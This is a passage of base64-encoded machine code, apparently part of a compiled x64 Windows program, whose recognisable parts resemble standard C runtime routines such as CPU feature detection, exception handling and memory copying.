D+Bl3A4PDIIvD6d4AAACB+wABAABzVUiF/3UNi8vouroAAIXAdOHrT0iNVwhIi8tIiwL2BFgBdM9IiwKL+0jB+QgPtskPvxRIweoPg+IBwf8IhdJ0PECIfCRoQbkCAAAAiFwkacZEJGoA6zVIjVcISIvLSIX/dcGL+8H/COhvuQAAQA+2zw+3FEiB4gCAAADrwIhcJGhBuQEAAADGRCRpAMdEJDgBAAAASI1EJHCJbCQwTI1EJGjHRCQoAwAAALoAAQAASIvOSIlEJCDo3AMAAIXAD4Qv////g/gBD7ZEJHB0Cg+2TCRxweAIC8FIi1wkYEiDxEBfXl3DzMzMSIlcJAhXSIPsIA9XwDPADxEBSIvZDxFBEEiJQSCJQSjoY7oAAIkD6MC6AACJQwTohLoAADP/SItIEIvHSIXJD5TAiUMISIXJdEDopbgAAEyLyESLx0SL12ZBOTl9GUmL0kGLwEjB6gOD4AcPtkwaDA+rwYhMGgxB/8BJ/8JJg8ECQYH4AAEAAHzOSIvDSItcJDBIg8QgX8NIiVwkCEiJbCQgVldBVkiD7EBIY9lIi/pIhdJ1E+j+uQAASItwEOjFuQAARIvw6wdIi3IYRIsySIX2dRKNQ5+D+Bl3A4PrIIvD6eAAAAC9AgAAAIH7AAEAAHNPSIX/dQ2Ly+gxuAAAhcB03OtJSI1XCEiLy0iLAkCELFh0ykiLAov7SMH5CA+2yQ+/FEjB6g+D4gHB/wiF0nQ2QIh8JGiIXCRpxkQkagDrNEiNVwhIi8tIhf91x4v7wf8I6Jy3AABAD7bPD7cUSIHiAIAAAOvGiFwkaL0BAAAAxkQkaQDHRCQ4AQAAAEiNRCRwRIl0JDBMjUQkaMdEJCgDAAAARIvNugACAABIiUQkIEiLzugGAgAAhcAPhC3///+D+AEPtkQkcHQKD7ZMJHHB4AgLwUiLXCRgSItsJHhIg8RAQV5fXsPMzMxI/yX1UwIAzEUzwLqgDwAASP8l3VMCAMxI/yXFUwIAzEj/JcVTAgDMQFNIg+wgSIvZugIAAABIjUwkMOhU3f//QbkBAAAATI0VB4P//0yJSwhBi8FBi9FNi4TCECUEAEiLyk2FwHQYTDvDdBNI/8BIiUMISIvQSIvISIP4CHLYRgCMEWAlBABJiZzKECUEAEiNTCQw6HPd//9Ig8QgW8PMQFNIg+wgSItBCEiL2UiFwHQQSI0N+6cDAP4MCIA8CAB/TUiLy+hOAAAASItbQEiF23Q8SItLCEiFyXQmSIsBSItAEP8Vc1UCAEiLyEiFwHQRSIsQSIsCugEAAAD/FVpVAgC6EAAAAEiLy+j1AwAASIPEIFvDzMzMSIlcJAhXSIPsIEiL+UiLWTjrFkSLQwhIi9czyUiLQxD/FR5VAgBIixtIhdt15UiLTzBIhcl0FUiLGboYAAAA6KgDAABIi8tIhdt160iDZzAASItPOEiFyXQVSIsZuhgAAADohQMAAEiLy0iF23XrSINnOABIi1wkMEiDxCBfw8xIg+woSIM9uJEDAAB0J/8VWFICAEiLDamRAwBIjRVapwMASP/JSIkNmJEDAEiJBMpIg8Qow+guvwAAzMxAVUFWQVdIg+xgSI1sJFBIiV0wSIl1OEiJfUBMiW1ISIsFcpEDAEgzxUiJRQhFM/ZJY/lJi/BEi/pMi+lFhcl+FEiL10mLyOhs6QAAO8eNeAF8Aov4911oRIvPi01gTIvGG9JEiXQkKIPiCEyJdCQg/8L/FchRAgBMY/CFwA+ETQIAAEmLxkgDwEiNSBBIO8FIG8BII8EPhBgCAABIuvD///////8PSD0ABAAAdzFIjUgPSDvIdwNIi8pIg+HwSIvB6KoIAABIK+FIjVwkUEiF2w+E3wEAAMcDzMwAAOsWSIvI6C2xAABIi9hIhcB0CscA3d0AAEiDwxBIhdsPhLQBAACLTWBEi89EiXQkKEyLxroBAAAASIlcJCD/FSBRAgCFwA+EjgEAAEiDZCRAAEWLzkiDZCQ4AEyLw0iDZCQwAEGL14NkJCgASYvNSINkJCAA/xXxUAIASGP4hcAPhFQBAAC6AAQAAESF+nRRi0VYhcAPhEYBAAA7+A+POQEAAEiDZCRAAEWLzkiDZCQ4AEyLw0iDZCQwAEGL14lEJChJi81Ii0VQSIlEJCD/FZhQAgCFwA+FBQEAAOn7AAAASIvPSAPJSI1BEEg7yEgbyUgjyA+E5wAAAEg7ync1SI1BD0g7wXcKSLjw////////D0iD4PDoeQcAAEgr4EiNdCRQSIX2D4S1AAAAxwbMzAAA6xPo/68AAEiL8EiFwHQKxwDd3QAASIPGEEiF9g+EjQAAAEiDZCRAAEWLzkiDZCQ4AEyLw0iDZCQwAEGL14l8JChJi81IiXQkIP8V608CAEUz9oXAdD2LRVgz0otNYESLz0yJdCQ4TIvGTIl0JDCFwHUMRIl0JChMiXQkIOsNiUQkKEiLRVBIiUQkIP8VaU8CAIv4SI1O8IE53d0AAHUQ6LaNAADrCTPbM/9Ihdt0EUiNS/CBOd3dAAB1BeiajQAAi8dIi00ISDPN6DQAAABIi10wSIt1OEiLfUBMi21ISI1lEEFfQV5dw8zMzMzMzMzMzMzMzMzMzMxmZg8fhAAAAAAASDsNgY4DAHUQSMHBEGb3wf//dQHDSMHJEOnGBgAAzMzpJwkAAMzMzEBTSIPsIEiL2esPSIvL6EHsAACFwHQTSIvL6L2uAABIhcB050iDxCBbw0iD+/90Buir2v//zOgtkf//zEBTSIPsIEiNBTdmAgBIi9lIiQH2wgF0CroYAAAA6Jr///9Ii8NIg8QgW8PMQFNIg+wguQEAAADozO0AAOhbCQAAi8joDPkAAOjn6v//i9jovBIBALkBAAAAiRjoyAIAAITAdHPopwsAAEiNDdwLAADoYwQAAOgq5f//i8joL/AAAIXAdVLoGgkAAOhJCQAAhcB0DEiNDZrq///oye0AAOjs4///6Ofj///ohur//4vI6MP+AADo5uT//4TAdAXo/fQAAOhs6v//6HsKAACFwHUGSIPEIFvDuQcAAADoGwkAAMzMzEiD7CjozwgAADPASIPEKMNIg+wo6KcKAADoMur//4vISIPEKOnXEQEAzMzMSIlcJAhIiXQkEFdIg+wwuQEAAADoswEAAITAD4Q2AQAAQDL2QIh0JCDoYgEAAIrYiw3OowMAg/kBD4QjAQAAhcl1SscFt6MDAAEAAABIjRV4UAIASI0NMVACAOi89AAAhcB0Crj/AAAA6dkAAABIjRUPUAIASI0NsE8CAOg39AAAxwV5owMAAgAAAOsIQLYBQIh0JCCKy+igAgAA6DMIAABIi9hIgzgAdB5Ii8jo8gEAAITAdBJFM8BBjVACM8lIiwP/FTxPAgDoDwgAAEiL2EiDOAB0FEiLyOjGAQAAhMB0CEiLC+gS9wAA6HHzAABIi/jovfcAAEiLGOit9wAATIvHSIvTiwjoMJv//4vY6C0JAACEwHRVQIT2dQXov/YAADPSsQHoNgIAAIvD6xmL2OgLCQAAhMB0O4B8JCAAdQXoi/YAAIvDSItcJEBIi3QkSEiDxDBfw7kHAAAA6IsHAACQuQcAAADogAcAAIvL6MX2AACQi8vodfYAAJBIg+wo6FsGAABIg8Qo6XL+///MzEiD7CjoiwsAAIXAdCFlSIsEJTAAAABIi0gI6wVIO8h0FDPA8EgPsQ1QogMAde4ywEiDxCjDsAHr98zMzEBTSIPsIA+2BTuiAwCFybsBAAAAD0TDiAUrogMA6IoJAADoySgAAITAdQQywOsU6DAVAQCEwHUJM8no2SgAAOvqisNIg8QgW8PMzMxAU0iD7CCAPfChAwAAi9l1Z4P5AXdq6PEKAACFwHQohdt1JEiNDdqhAwDoTRMBAIXAdRBIjQ3ioQMA6D0TAQCFwHQuMsDrM2YPbwXVYgIASIPI//MPfwWpoQMASIkFsqEDAPMPfwWyoQMASIkFu6EDAMYFhaEDAAGwAUiDxCBbw7kFAAAA6EoGAADMzEiD7BhMi8G4TVoAAGY5BUV6//91eEhjDXh6//9IjRU1ev//SAPKgTlQRQAAdV+4CwIAAGY5QRh1VEwrwg+3URRIg8IYSAPRD7dBBkiNDIBMjQzKSIkUJEk70XQYi0oMTDvBcgqLQggDwUw7wHIISIPCKOvfM9JIhdJ1BDLA6xSDeiQAfQQywOsKsAHrBjLA6wIywEiDxBjDQFNIg+wgitno2wkAADPShcB0C4TbdQdIhxWyoAMASIPEIFvDQFNIg+wggD2noAMAAIrZdASE0nUM6MoTAQCKy+hjJwAAsAFIg8QgW8PMzMxAU0iD7CBIgz2CoAMA/0iL2XUH6KQRAQDrD0iL00iNDWygAwDoBxIBADPShcBID0TTSIvCSIPEIFvDzMxIg+wo6Lv///9I99gbwPfY/8hIg8Qow8xIg+woTYtBOEiLykmL0egNAAAAuAEAAABIg8Qow8zMzEBTRYsYSIvaQYPj+EyLyUH2AARMi9F0E0GLQAhNY1AE99hMA9FIY8hMI9FJY8NKixQQSItDEItICEiLQwj2RAEDD3QLD7ZEAQOD4PBMA8hMM8pJi8lb6TH6///MSIvESIlYCEiJaBBIiXAYSIl4IEFWSIPsIEmLWThIi/JNi/BIi+lJi9FIi85Ji/lMjUME6Gz///+LRQQkZvbYuAEAAABFG8BB99hEA8BEhUMEdBFMi89Ni8ZIi9ZIi83obBQAAEiLXCQwSItsJDhIi3QkQEiLfCRISIPEIEFew8zMzMzMzMxmZg8fhAAAAAAASIPsEEyJFCRMiVwkCE0z20yNVCQYTCvQTQ9C02VMixwlEAAAAE0703MWZkGB4gDwTY2bAPD//0HGAwBNO9N18EyLFCRMi1wkCEiDxBDDzMxAU0iD7CBIi9kzyf8Vr0gCAEiLy/8VnkgCAP8VEEgCAEiLyLoJBADASIPEIFtI/yWUSAIASIlMJAhIg+w4uRcAAAD/FYhIAgCFwHQHuQIAAADNKUiNDVafAwDoyQEAAEiLRCQ4SIkFPaADAEiNRCQ4SIPACEiJBc2fAwBIiwUmoAMASIkFl54DAEiLRCRASIkFm58DAMcFcZ4DAAkEAMDHBWueAwABAAAAxwV1ngMAAQAAALgIAAAASGvAAEiNDW2eAwBIxwQBAgAAALgIAAAASGvAAEiLDf2GAwBIiUwEILgIAAAASGvAAUiLDfCGAwBIiUwEIEiNDRRfAgDo//7//0iDxDjDzMxIg+wouQgAAADoBgAAAEiDxCjDzIlMJAhIg+wouRcAAAD/FaFHAgCFwHQIi0QkMIvIzSlIjQ1ungMA6HEAAABIi0QkKEiJBVWfAwBIjUQkKEiDwAhIiQXlngMASIsFPp8DAEiJBa+dAwDHBZWdAwAJBADAxwWPnQMAAQAAAMcFmZ0DAAEAAAC4CAAAAEhrwABIjQ2RnQMAi1QkMEiJFAFIjQ1iXgIA6E3+//9Ig8Qow0iJXCQgV0iD7EBIi9n/FdVGAgBIi7v4AAAASI1UJFBIi89FM8D/FcVGAgBIhcB0MkiDZCQ4AEiNTCRYSItUJFBMi8hIiUwkMEyLx0iNTCRgSIlMJCgzyUiJXCQg/xWWRgIASItcJGhIg8RAX8PMzMxAU1ZXSIPsQEiL2f8VZ0YCAEiLs/gAAAAz/0UzwEiNVCRgSIvO/xVVRgIASIXAdDlIg2QkOABIjUwkaEiLVCRgTIvISIlMJDBMi8ZIjUwkcEiJTCQoM8lIiVwkIP8VJkYCAP/Hg/8CfLFIg8RAX15bw8zMzOkHhAAAzMzMSIlcJCBVSIvsSIPsIEiLBSCFAwBIuzKi3y2ZKwAASDvDdXRIg2UYAEiNTRj/FRpGAgBIi0UYSIlFEP8VBEYCAIvASDFFEP8V8EUCAIvASI1NIEgxRRD/FdhFAgCLRSBIjU0QSMHgIEgzRSBIM0UQSDPBSLn///////8AAEgjwUi5M6LfLZkrAABIO8NID0TBSIkFnYQDAEiLXCRISPfQSIkFloQDAEiDxCBdw7gAQAAAw8zMSI0NIaEDAEj/JZJFAgDMzEiNBSGhAwDDSIPsKOiXhf//SIMIJOjm////SIMIAkiDxCjDzDPAOQVchAMAD5TAw0iNBSGuAwDDSI0FEa4DAMODJemgAwAAw0iJXCQIVUiNrCRA+///SIHswAUAAIvZuRcAAAD/Ff5EAgCFwHQEi8vNKbkDAAAA6MT///8z0kiNTfBBuNAEAADoixoAAEiNTfD/FaFEAgBIi53oAAAASI2V2AQAAEiLy0UzwP8Vj0QCAEiFwHQ8SINkJDgASI2N4AQAAEiLldgEAABMi8hIiUwkMEyLw0iNjegEAABIiUwkKEiNTfBIiUwkIDPJ/xVWRAIASIuFyAQAAEiNTCRQSImF6AAAADPSSI2FyAQAAEG4mAAAAEiDwAhIiYWIAAAA6PQZAABIi4XIBAAASIlEJGDHRCRQFQAAQMdEJFQBAAAA/xVSRAIAg/gBSI1EJFBIiUQkQEiNRfAPlMNIiUQkSDPJ/xXxQwIASI1MJED/Fd5DAgCFwHUMhNt1CI1IA+i+/v//SIucJNAFAABIgcTABQAAXcPM6eff///MzMxIg+woM8n/FfhCAgBIhcB0OblNWgAAZjkIdS9IY0g8SAPIgTlQRQAAdSC4CwIAAGY5QRh1FYO5hAAAAA52DIO5+AAAAAAPlcDrAjLASIPEKMPMzMxIjQ0JAAAASP8lWkMCAMzMSIlcJAhXSIPsIEiLGUiL+YE7Y3Nt4HUcg3sYBHUWi1MgjYLg+mzmg/gCdhWB+gBAmQF0DUiLXCQwM8BIg8QgX8PoEhEAAEiJGEiLXwjoGhEAAEiJGOh+DAEAzMxIiVwkCFdIg+wgSI0dE0YDAEiNPQxGAwDrEkiLA0iFwHQG/xXcRAIASIPDCEg733LpSItcJDBIg8QgX8NIiVwkCFdIg+wgSI0d50UDAEiNPeBFAwDrEkiLA0iFwHQG/xWgRAIASIPDCEg733LpSItcJDBIg8QgX8NIiVwkEEiJdCQYV0iD7BAzwDPJD6JEi8FFM9tEi9JBgfBudGVsQYHyaW5lSUSLy4vwM8lBjUMBRQvQD6JBgfFHZW51iQQkRQvRiVwkBIv5iUwkCIlUJAx1W0iDDWuBAwD/JfA//w9IxwVTgQMAAIAAAD3ABgEAdCg9YAYCAHQhPXAGAgB0GgWw+fz/g/ggdyRIuQEAAQABAAAASA+jwXMURIsFuZ0DAEGDyAFEiQWunQMA6wdEiwWlnQMAuAcAAABEjUj7O/B8JjPJD6KJBCREi9uJXCQEiUwkCIlUJAwPuuMJcwpFC8FEiQVynQMAxwXEgAMAAQAAAESJDcGAAwAPuucUD4ORAAAARIkNrIADALsGAAAAiR2lgAMAD7rnG3N5D7rnHHNzM8kPAdBIweIgSAvQSIlUJCBIi0QkICLDOsN1V4sFd4ADAIPICMcFZoADAAMAAACJBWSAAwBB9sMgdDiDyCDHBU2AAwAFAAAAiQVLgAMAuAAAA9BEI9hEO9h1GEiLRCQgJOA84HUNgw0sgAMAQIkdIoADAEiLXCQoM8BIi3QkMEiDxBBfwzPAOQXAqQMAD5XAw8zMzMzMzMzMzMzMzEiLxEyJSCBMiUAYSIlQEEiJSAhTSIPscEiL2YNgyABIiUjgTIlA6OjgHQAASI1UJFiLC0iLQBD/FYtCAgDHRCRAAAAAAOsAi0QkQEiDxHBbw8zMzEiLxEyJSCBMiUAYSIlQEEiJSAhTSIPscEiL2YNgyABIiUjgTIlA6OiMHQAASI1UJFiLC0iLQBD/FTdCAgDHRCRAAAAAAOsAi0QkQEiDxHBbw8zMzEiJXCQISIlsJBBIiXQkGFdIg+wgi3kMi/KF/0iL6XQrjV//i/voOh0AAEiNFJtIi0BgSI0MkEhjRRBIA8E7cAR+BTtwCH4Ghdvr0zPASItcJDBIi2wkOEiLdCRASIPEIF/DzMxIi8RIiVgISIloEEiJcBhIiXggQVaKGUyNUQGIGkGL8UyNNY1u//9Ji+hMi9pIi/n2wwR0JEEPtgqD4Q9KD76EMWDoAgBCiowxcOgCAEwr0EGLQvzT6IlCBPbDCHQKQYsCSYPCBIlCCPbDEHQKQYsCSYPCBIlCDEljAk2NQgRFM8lEOEwkMHVQ9sMCdEtIjRQoD7YKg+EPSg++hDFg6AIAQoqMMXDoAgBIK9BEi1L8QdPqRYlLEEWF0nQgiwKLSgRIjVIIO8Z0CkH/wUU7ynLr6wlBiUsQ6wOJQhD2wwF0JUEPtgiD4Q9KD76UMWDoAgBCiowxcOgCAEwrwkGLUPzT6kGJUxRIi1wkEEwrx0iLbCQYSYvASIt0JCBIi3wkKEFew8zMQFNIg+wgSIvaSIvRSIvL6PwdAACL0EiLy+ha/v//SIXAD5XASIPEIFvDzMyKAiQBw8zMzEiJXCQISIl0JBBXSIPsIEyNTCRISYvYSIv66HkAAABIi9dIi8tIi/Dorx0AAIvQSIvL6A3+//9IhcB1BkGDyf/rBESLSARMi8NIi9dIi87oiEQAAEiLXCQwSIt0JDhIg8QgX8NIg+woQfYAAUiLCUiJTCQwdA1Bi0AUSIsMCEiJTCQwQYPJ/0iNTCQw6NdFAABIg8Qow8zMSIlcJBBIiWwkGFZXQVRBVkFXSIPsIEGLcAxMi+FJi8hJi/lNi/BMi/roFh0AAE2LFCSL6EyJF4X2dHdJY0YQjU7/i/FIjQyJSI0ciEkDXwg7awR+4jtrCH/dSYsPSI1UJFBFM8D/FUE9AgBMY0MQM8lMA0QkUESLSwxEixBFhcl0F0mNUAxIYwJJO8J0C//BSIPCFEE7yXLtQTvJc5lJiwQkSI0MiUljTIgQSIsMAUiJD0iLXCRYSIvHSItsJGBIg8QgQV9BXkFcX17DSIsBSIvRSYkBQfYAAXQOQYtIFEiLAkiLDAFJiQlJi8HDzMzMSIlcJAhIiWwkEEiJdCQYV0FUQVVBVkFXSIPsQEiLnCSQAAAATIviSIvpSYvRSIvLSYv5RYv4RItzDOgVHAAARTPSi/BFhfYPhOsAAABMi18Ig8j/SGNbEESLyESL6EGL1kSNQv9LjQyASY0Eizt0GAR+Bjt0GAh+CEGL0EWFwHXgRYvChdJ0EI1C/0iNBIBIjRSDSQPT6wNJi9JJjQwbQYPL/0iF0nQPi0IEOQF+I4tCCDlBBH8bRDs5fBZEO3kEfxBFO8tBi8BFi+hBD0XBRIvIQf/ASIPBFEU7xnLFRTvLTIlkJCBBi8JMiWQkMEEPRcFMjVwkQEmLWzBJi3NAiUQkKEGNRQEPEEQkIEQPRdBIi8VEiVQkOA8QTCQw8w9/RQDzD39NEEmLazhJi+NBX0FeQV1BXF/D6EOoAADMzMxIi8RIiVgISIloEEiJcBhIiXggQVZIg+xgSIlUJCBIi/oPKXDoSIvpSIlUJDAz24lcJChIjVDYDyh0JCBIi89mD39w2EWL8DP26EIDAABEiw8z0kWFyQ+EwgAAAEyLRwhMjRUtav//SItHGIvLRDvwfBtIweggRDvwfxKFyYvai/IPRNmJXCQoDyh0JCBBD7YI/8KD4Q9KD76EEWDoAgBCiowRcOgCAEwrwEGLQPzT6EyJRwiJRxhBD7YIg+EPSg++hBFg6AIAQoqMEXDoAgBMK8BBi0D80+hMiUcIiUccQQ+2CIPhD0oPvoQRYOgCAEKKjBFw6AIATCvAQYtA/NPoTIlHCIlHIEGLAEmDwARMiUcIiUckQTvRD4VJ/////8ZmD390JEBIjVQkQIl0JDhIi8/oWQIAAA8QRCQwTI1cJGBIi8VJi1sQSYtzIEmLeyjzD391AA8odCRQ8w9/RRBJi2sYSYvjQV7DzMzMQFVIjWwk4UiB7OAAAABIiwUreQMASDPESIlFD0yLVXdIjQUhUgIADxAATIvZSI1MJDAPEEgQDxEBDxBAIA8RSRAPEEgwDxFBIA8QQEAPEUkwDxBIUA8RQUAPEEBgDxFJUA8QiIAAAAAPEUFgDxBAcEiLgJAAAAAPEUFwDxGJgAAAAEiJgZAAAABIjQWQOQAASYsLSIlFj0iLRU9IiUWfSGNFX0iJRadIi0VXSIlFtw+2RX9IiUXHSYtCQEiJRCQoSYtCKEyJTZdFM8lMiUWvTI1EJDBIiVW/SYsSSIlEJCBIx0XPIAWTGf8VijkCAEiLTQ9IM8zovun//0iBxOAAAABdw8xAVUiNbCThSIHs4AAAAEiLBSd4AwBIM8RIiUUPTItVd0iNBX1QAgAPEABMi9lIjUwkMA8QSBAPEQEPEEAgDxFJEA8QSDAPEUEgDxBAQA8RSTAPEEhQDxFBQA8QQGAPEUlQDxCIgAAAAA8RQWAPEEBwSIuAkAAAAA8RQXAPEYmAAAAASImBkAAAAEiNBXg6AABIiUWPSItFT0iJRZ9IY0VfTIlFr0yLRW9IiUWnD7ZFf0iJRcdJi0gYTYtAIEkDSghNA0IISGNFZ0iJRedJi0JASIlEJChJi0IoTIlNl0UzyUiJTbdJiwtIiVW/SYsSTIlF10yNRCQwSIlEJCBIx0XPIAWTGf8VajgCAEiLTQ9IM8zonuj//0iBxOAAAABdw8xMi0EQTI0d+Wb//0yJQQhMi8lBD7YIg+EPSg++hBlg6AIAQoqMGXDoAgBMK8BBi0D80+hNiUEIQYlBGEEPtgiD4Q9KD76EGWDoAgBCiowZcOgCAEwrwEGLQPxNiUEI0+hBiUEcQQ+2CIPhD0oPvoQZYOgCAEKKjBlw6AIATCvAQYtA/E2JQQjT6EGJQSBBiwBJg8AEg3oIAE2JQQhBiUEkD4QbAQAARItSCEEPtgiD4Q9KD76EGWDoAgBCiowZcOgCAEwrwEGLQPxNiUEI0+hBiUEYQQ+2CIPhD0oPvoQZYOgCAEKKjBlw6AIATCvAQYtA/E2JQQjT6EGJQRxBD7YIg+EPSg++hBlg6AIAQoqMGXDoAgBMK8BBi0D8SY1QBE2JQQjT6EGJQSBBiwBJiVEIQYlBJA+2CoPhD0oPvoQZYOgCAEKKjBlw6AIASCvQi0L80+hJiVEIQYlBGA+2CoPhD0oPvoQZYOgCAEKKjBlw6AIASCvQi0L80+hJiVEIQYlBHA+2CoPhD0oPvoQZYOgCAEKKjBlw6AIASCvQi0L8TI1CBNPoSYlRCEGJQSCLAk2JQQhBiUEkSYPqAQ+F6f7//8PMzEBTSIPsIEiL2UiJEeh7EwAASDtYWHML6HATAABIi0hY6wIzyUiJSwjoXxMAAEiJWFhIi8NIg8QgW8PMzEiJXCQIV0iD7CBIi/noPhMAAEg7eFh1NegzEwAASItQWEiF0nQnSItaCEg7+nQKSIvTSIXbdBbr7egSEwAASIlYWEiLXCQwSIPEIF/D6F6iAADMzEiD7Cjo8xIAAEiLQGBIg8Qow8zMSIPsKOjfEgAASItAaEiDxCjDzMxAU0iD7CBIi9noxhIAAEiJWGBIg8QgW8NAU0iD7CBIi9norhIAAEiJWGhIg8QgW8NIi8RIiVgQSIloGEiJcCBXSIPsQEmLWQhJi/lJi/BIiVAISIvp6HoSAABIiVhgSItdOOhtEgAASIlYaOhkEgAASItPOEyLz0yLxosRSIvNSANQYDPAiEQkOEiJRCQwiUQkKEiJVCQgSI1UJFDoYy4AAEiLXCRYSItsJGBIi3QkaEiDxEBfw8zMSIvESIlYEEiJaBhIiXAgV0iD7GCDYNwASYv5g2DgAEmL8INg5ABIi+mDYOgAg2DsAEmLWQjGQNgASIlQCOjaEQAASIlYYEiLXTjozREAAEiJWGjoxBEAAEiLTzhIjVQkQEyLRwjGRCQgAIsJSANIYEiLRxBEiwjooPT//8ZEJDgASI1EJEBIg2QkMABIjVQkcINkJCgATIvPTIvGSIlEJCBIi83o2y8AAEyNXCRgSYtbGEmLayBJi3MoSYvjX8PMSIlcJAhIiXQkEEiJfCQYQVZIg+wggHkIAEyL8kiL8XRMSIsBSIXAdERIg8//SP/HgDw4AHX3SI1PAehlkwAASIvYSIXAdBxMiwZIjVcBSIvI6Fr9AABIi8NBxkYIAUmJBjPbSIvL6I1xAADrCkiLAUiJAsZCCABIi1wkMEiLdCQ4SIt8JEBIg8QgQV7DzMzMQFNIg+wggHkIAEiL2XQISIsJ6FFxAABIgyMAxkMIAEiDxCBbw8zMzEiLBcGPAwCQw8zMzEiD7Cjo6////0iFwHQG/xVANQIA6N+fAADMzMxIhcl0Z4hUJBBIg+xIgTljc23gdVODeRgEdU2LQSAtIAWTGYP4AndASItBMEiFwHQ3SGNQBIXSdBFIA1E4SItJKOgqAAAA6yDrHvYAEHQZSItBKEiLCEiFyXQNSIsBSItAEP8V0DQCAEiDxEjDzMzMSP/izEBTSIPsIEiL2ej6DwAASItQWOsJSDkadBJIi1IISIXSdfKNQgFIg8QgW8MzwOv2zEhjAkgDwYN6BAB8FkxjSgRIY1IISYsMCUxjBApNA8FJA8DDzEiJXCQIV0iD7CBIizlIi9mBP1JDQ+B0EoE/TU9D4HQKgT9jc23gdCLrE+iFDwAAg3gwAH4I6HoPAAD/SDBIi1wkMDPASIPEIF/D6GUPAABIiXggSItbCOhYDwAASIlYKOiD+wAAzMzMSIPsKOhDDwAASIPAIEiDxCjDzMxIg+wo6C8PAABIg8AoSIPEKMPMzEiD7CjoT/sAAMzMzEiJXCQYSIl0JCBXSIPsUEiL2kiL8b8gBZMZSIXSdB32AhB0GEiLCUiD6QhIiwFIi1gwSItAQP8VmDMCAEiNVCQgSIvL/xXaMQIASIlEJCBIhdt0D/YDCHUFSIXAdQW/AECZAboBAAAASIl8JChMjUwkKEiJdCQwuWNzbeBIiVwkOEiJRCRARI1CA/8VnDECAEiLXCRwSIt0JHhIg8RQX8PMzMzMzMzMzMzMzMzMzMzMzMxmZg8fhAAAAAAAV1ZIi/lIi/JJi8jzpF5fw8zMzMzMzGZmDx+EAAAAAABIi8FMjRXmX///SYP4Dw+HDAEAAGZmZmYPH4QAAAAAAEeLjIIAcAQATQPKQf/hw5BMiwKLSghED7dKDEQPtlIOTIkAiUgIZkSJSAxEiFAOw0yLAg+3SghED7ZKCkyJAGaJSAhEiEgKww+3CmaJCMOQiwpED7dCBEQPtkoGiQhmRIlABESISAbDTIsCi0oIRA+3SgxMiQCJSAhmRIlIDMMPtwpED7ZCAmaJCESIQALDkEyLAotKCEQPtkoMTIkAiUgIRIhIDMNMiwIPt0oITIkAZolICMNMiwIPtkoITIkAiEgIw0yLAotKCEyJAIlICMOLCkQPt0IEiQhmRIlABMOLCkQPtkIEiQhEiEAEw0iLCkiJCMMPtgqICMOLCokIw5BJg/ggdxfzD28K80IPb1QC8PMPfwnzQg9/VAHww0g70XMOTo0MAkk7yQ+CQQQAAJCDPdFuAwADD4LjAgAASYH4ACAAAHYWSYH4AAAYAHcN9gVWiwMAAg+FZP7//8X+bwLEoX5vbALgSYH4AAEAAA+GxAAAAEyLyUmD4R9Jg+kgSSvJSSvRTQPBSYH4AAEAAA+GowAAAEmB+AAAGAAPhz4BAABmZmZmZmYPH4QAAAAAAMX+bwrF/m9SIMX+b1pAxf5vYmDF/X8Jxf1/USDF/X9ZQMX9f2Fgxf5vioAAAADF/m+SoAAAAMX+b5rAAAAAxf5vouAAAADF/X+JgAAAAMX9f5GgAAAAxf1/mcAAAADF/X+h4AAAAEiBwQABAABIgcIAAQAASYHoAAEAAEmB+AABAAAPg3j///9NjUgfSYPh4E2L2UnB6wVHi5yaQHAEAE0D2kH/48Shfm+MCgD////EoX5/jAkA////xKF+b4wKIP///8Shfn+MCSD////EoX5vjApA////xKF+f4wJQP///8Shfm+MCmD////EoX5/jAlg////xKF+b0wKgMShfn9MCYDEoX5vTAqgxKF+f0wJoMShfm9MCsDEoX5/TAnAxKF+f2wB4MX+fwDF+HfDZpDF/m8Kxf5vUiDF/m9aQMX+b2Jgxf3nCcX951Egxf3nWUDF/edhYMX+b4qAAAAAxf5vkqAAAADF/m+awAAAAMX+b6LgAAAAxf3niYAAAADF/eeRoAAAAMX955nAAAAAxf3noeAAAABIgcEAAQAASIHCAAEAAEmB6AABAABJgfgAAQAAD4N4////TY1IH0mD4eBNi9lJwesFR4ucmmRwBABNA9pB/+PEoX5vjAoA////xKF954wJAP///8Shfm+MCiD////EoX3njAkg////xKF+b4wKQP///8ShfeeMCUD////EoX5vjApg////xKF954wJYP///8Shfm9MCoDEoX3nTAmAxKF+b0wKoMShfedMCaDEoX5vTArAxKF950wJwMShfn9sAeDF/n8AD674xfh3w2ZmZmZmZmYPH4QAAAAAAEmB+AAIAAB2DfYFfIgDAAIPhYr7///zD28C80IPb2wC8EmB+IAAAAAPho4AAABMi8lJg+EPSYPpEEkryUkr0U0DwUmB+IAAAAB2cQ8fRAAA8w9vCvMPb1IQ8w9vWiDzD29iMGYPfwlmD39REGYPf1kgZg9/YTDzD29KQPMPb1JQ8w9vWmDzD29icGYPf0lAZg9/UVBmD39ZYGYPf2FwSIHBgAAAAEiBwoAAAABJgeiAAAAASYH4gAAAAHOUTY1ID0mD4fBNi9lJwesER4ucmohwBABNA9pB/+PzQg9vTAqA80IPf0wJgPNCD29MCpDzQg9/TAmQ80IPb0wKoPNCD39MCaDzQg9vTAqw80IPf0wJsPNCD29MCsDzQg9/TAnA80IPb0wK0PNCD39MCdDzQg9vTArg80IPf0wJ4PNCD39sAfDzD38Aw2YPH4QAAAAAAEyL2UyL0kgr0UkDyA8QRBHwSIPpEEmD6BD2wQ90F0iLwUiD4fAPEMgPEAQRDxEITIvBTSvDTYvIScHpB3RvDykB6xRmZmZmZg8fhAAAAAAADylBEA8pCQ8QRBHwDxBMEeBIgemAAAAADylBcA8pSWAPEEQRUA8QTBFASf/JDylBUA8pSUAPEEQRMA8QTBEgDylBMA8pSSAPEEQREA8QDBF1rg8pQRBJg+B/DyjBTYvIScHpBHQaZmYPH4QAAAAAAA8RAUiD6RAPEAQRSf/JdfBJg+APdAhBDxAKQQ8RCw8RAUmLw8PMzMzMzMzMzMzMzMzMzMzMzGZmDx+EAAAAAABXi8JIi/lJi8jzqkmLwV/DzMzMzMzMZmYPH4QAAAAAAEiLwUyLyUyNFTNZ//8PttJJuwEBAQEBAQEBTA+v2mZJD27DSYP4Dw+HgwAAAA8fAEkDyEeLjIKwcAQATQPKQf/hTIlZ8USJWflmRIlZ/USIWf/DTIlZ8kSJWfpmRIlZ/sNmZmZmZmZmDx+EAAAAAABMiVnzRIlZ+0SIWf/DDx8ATIlZ9ESJWfzDTIlZ9WZEiVn9RIhZ/8NMiVn3RIhZ/8NMiVn2ZkSJWf7DTIlZ+MOQZg9swEmD+CB3DPMPfwHzQg9/RAHww4M9q2gDAAMPgt0BAABMOwWmaAMAdhZMOwWlaAMAdw32BTCFAwACD4Xu/v//xON9GMABTIvJSYPhH0mD6SBJK8lJK9FNA8FJgfgAAQAAdmVM